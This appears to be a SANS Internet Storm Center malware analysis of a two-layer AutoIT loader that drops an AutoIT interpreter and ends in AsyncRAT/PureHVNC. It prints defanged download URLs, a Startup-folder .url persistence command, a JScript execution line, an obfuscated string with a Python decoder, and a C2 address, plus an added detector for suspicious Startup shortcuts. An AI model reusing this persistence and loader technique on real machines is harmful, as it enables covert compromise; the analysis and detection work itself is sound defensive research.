Like .Net, AutoIT[1] has remained a popular language in the malware ecosystem for years. It's a simple language that can interact with all the components of the Windows operating system. I regularly discover AutoIT3 binaries (yes, it can be compiled). This weekend, I found a piece of malware delivered through a double layer of AutoIT code!
The initial file is an executable called "1. Project & Profit.exe" (SHA256: b5fbae9376db12a3fcbc99e83ccad97c87fb9e23370152d1452768a3676f5aeb). This is a compiled AutoIT script. Once decompiled, the code is simple and contains interesting strings:
```autoit
Global $VY9A = "hxxps://xcvbsfq32e42313[.]xyz/OLpixJTrO"
Global $ZX2B = "C:\Users\Public\Guard.exe"
Global $FW3N = "C:\Users\Public\PublicProfile.ps1"
$fU5L = ""hxxps://xcvbsfq32e42313[.]xyz/hYlXpuF.txt"""
$oF6L = ""C:\Users\Public\Secure.au3
```
Its behaviour is simple: it generates the PublicProfile.ps1 file and executes it.
An AutoIT interpreter is downloaded (and saved as "C:\Users\Public\Guard.exe"), as well as another piece of AutoIT script (the second layer).
Persistence is achieved via a simple .url file placed in the Startup directory:
```batch
cmd /k echo [InternetShortcut] > "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
```
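A .url file in a Startup folder is expected to open a web address, not a script in a user-writable directory, which makes this persistence trick easy to hunt for. The following is an added example (not code from the diary or from the malware) that parses the [InternetShortcut] INI format and flags any URL= target that is a local script/executable under a user-writable path. The two .url files are constructed for the example: the first mirrors the shape of the SwiftWrite.url described above, the second is a benign shortcut. On a real host you would feed it the contents of every *.url found under the per-user and all-users Startup folders.

```python
import configparser
import re
from pathlib import PureWindowsPath

# Constructed sample .url files (path -> content); not collected from a real host.
SAMPLE_URL_FILES = {
    r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url":
        "[InternetShortcut]\r\nURL=C:\\Users\\admin\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.js\r\n",
    r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intranet.url":
        "[InternetShortcut]\r\nURL=https://intranet.example.local/\r\nIconIndex=0\r\n",
}

# Extensions that should never be the target of a Startup .url shortcut (assumed list).
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".bat", ".cmd",
               ".pif", ".scr", ".exe", ".lnk", ".au3"}

# Directories an unprivileged user can write to (assumed set of prefixes).
USER_WRITABLE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\|^[A-Za-z]:\\Users\\Public\\|^[A-Za-z]:\\ProgramData\\",
    re.IGNORECASE,
)


def parse_url_target(content: str):
    """Return the URL= value of an [InternetShortcut] file, or None if absent."""
    cp = configparser.ConfigParser(interpolation=None)  # no '%' interpolation on raw paths
    cp.read_string(content)
    return cp.get("InternetShortcut", "URL", fallback=None)


def is_suspicious_target(target) -> bool:
    """True when the shortcut points at a script/executable in a user-writable folder."""
    if not target:
        return False
    m = re.match(r"^file:///?", target, re.IGNORECASE)
    if m:  # file:///C:/... is still a local path
        target = target[m.end():].replace("/", "\\")
    elif re.match(r"^[a-z][a-z0-9+.-]*://", target, re.IGNORECASE):
        return False  # ordinary web URL, the legitimate use of a .url file
    ext = PureWindowsPath(target).suffix.lower()
    return ext in SCRIPT_EXTS and bool(USER_WRITABLE.match(target))


def hunt_startup_urls(files: dict):
    """Return (url_file_path, target) for every suspicious shortcut in `files`."""
    findings = []
    for path, content in files.items():
        target = parse_url_target(content)
        if is_suspicious_target(target):
            findings.append((path, target))
    return findings


if __name__ == "__main__":
    for path, target in hunt_startup_urls(SAMPLE_URL_FILES):
        print(f"SUSPICIOUS: {path} -> {target}")
```

The check deliberately keys on the combination of extension and location: a .url pointing at a script under Program Files is unusual but could be an installer artefact, while one pointing at a .js or .pif under AppData\Local is the pattern seen here.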
The JavaScript file re-executes the AutoIT interpreter ("SwiftWrite.pif") with its second script ("G"):
```javascript
new ActiveXObject("Wscript.Shell").Run(""C:\Users\REM\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\REM\AppData\Local\WordGenius Technologies\G"")
```
Let's have a look at "G", the second layer of AutoIT code. This script is pretty well obfuscated: all strings are encoded and decoded at runtime through the Wales() function. Example:
```autoit
If (Execute(Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0/2))) ...
```
The Wales() function is simple: each "]"-separated number is a character code shifted by the key passed as second argument (here 0/2, i.e. 0). Here is a Python version to help decode all strings:
```
remnux@remnux:/MalwareZoo/20250518$ python3
Python 3.8.10 (default, Jun 22 2022, 20:18:18) [GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> def Wales(encoded: str, key: int) -> str:
...     parts = [p for p in encoded.split("]") if p]
...     decoded = ''.join(chr(int(num) - key) for num in parts)
...     return decoded
...
>>> Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0)
"ProcessExists('avastui.exe')"
```
Finally, a "jsc.exe" process is spawned and the final malware is injected into it as a DLL: Urshqbgpm.dll
I'm not sure about the final payload: it tried to connect to the C2 server 139[.]99[.]188[.]124 on port 56001, and that address is associated with AsyncRAT.
But in the DLL we can find a lot of references to PureHVNC[2].
[1] https://www.autoitscript.com/site/
[2] https://cyble.com/blog/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.